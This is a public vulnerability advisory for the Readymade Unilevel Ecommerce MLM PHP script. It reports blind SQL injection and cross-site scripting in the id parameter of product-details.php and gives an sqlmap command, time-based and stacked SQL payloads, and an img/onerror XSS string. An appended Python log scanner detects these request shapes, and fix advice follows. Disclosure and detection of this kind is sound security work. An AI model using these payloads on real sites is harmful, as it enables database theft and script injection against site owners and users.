ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

Readymade Unilevel Ecommerce MLM suffers from remote blind SQL injection and cross site scripting vulnerabilities. These issues affected the version released as late as March 15, 2024.

Packet Storm
#sql #xss #vulnerability #php #auth
[x]======================================================================[x]
 | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities
 | Software     : Readymade Unilevel Ecommerce
 | Last Update  : 15/03/24 [TESTED VERSION SCRIPT]
 | First Release: 16/11/21
 | Vendor       : http://www.i-netsolution.com/
 | Date         : 01 August 2024
 | Author       : OoN_Boy
[x]======================================================================[x]
 | Technology       : PHP
 | Database         : MySQL
 | Price            : $500
 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.
[x]======================================================================[x]

[O] Exploit

    http://localhost/eommlm/product-details.php?id=11[SQL]
    http://localhost/ecomlm/product-details.php?id=11[XSS]

[O] Proof of concept

    sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string

    [SQL]

    Parameter: id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 1189=1189

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=11;SELECT SLEEP(10)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)

    [XSS]

    http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>

[x]======================================================================[x]

[O] Greetz

    BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc], xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^

[x]======================================================================[x]
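A defender-side check for the request shapes reported above, as an added example that is not part of the advisory or the vendor's code: it scans web access-log lines for product-details.php requests whose id parameter is not a plain integer and labels what it finds. The log lines are constructed, and the combined log format and the 1-10 digit id rule are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (combined log format assumed); not data from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2024:10:00:01 +0000] "GET /product-details.php?id=11 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2024:10:00:07 +0000] "GET /product-details.php?id=11%20AND%201189=1189 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2024:10:00:09 +0000] "GET /product-details.php?id=11%3BSELECT%20SLEEP(10)%23 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2024:10:00:30 +0000] "GET /product-details.php?id=11%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(10)))DddL) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2024:10:02:00 +0000] "GET /product-details.php?id=11%22%3E%3Cimg%3E HTTP/1.1" 200 5300',
    '198.51.100.7 - - [01/Aug/2024:10:02:05 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VALID_ID = re.compile(r"[0-9]{1,10}")  # assumption: product ids are short decimal integers
SIGNS = [  # shapes of the payload types listed in the advisory
    ("time-based", re.compile(r"sleep\s*\(", re.I)),
    ("stacked-query", re.compile(r";")),
    ("boolean-based", re.compile(r"\b(?:and|or)\b\s+\S+\s*=", re.I)),
    ("markup", re.compile(r"[<>\"']")),
]

def classify_id(value):
    """Return [] for a clean numeric id, otherwise a list of labels."""
    if VALID_ID.fullmatch(value):
        return []
    tags = [name for name, rx in SIGNS if rx.search(value)]
    return tags or ["non-numeric"]

def scan(lines, page="product-details.php"):
    """Return (client, decoded id, labels) for each suspicious request to `page`."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + page):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            tags = classify_id(value)
            if tags:
                hits.append((client, value, tags))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Log review only shows who probed the parameter; the fix itself belongs in the application, by casting id to an integer, binding it in a prepared statement, and HTML-encoding it on output.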
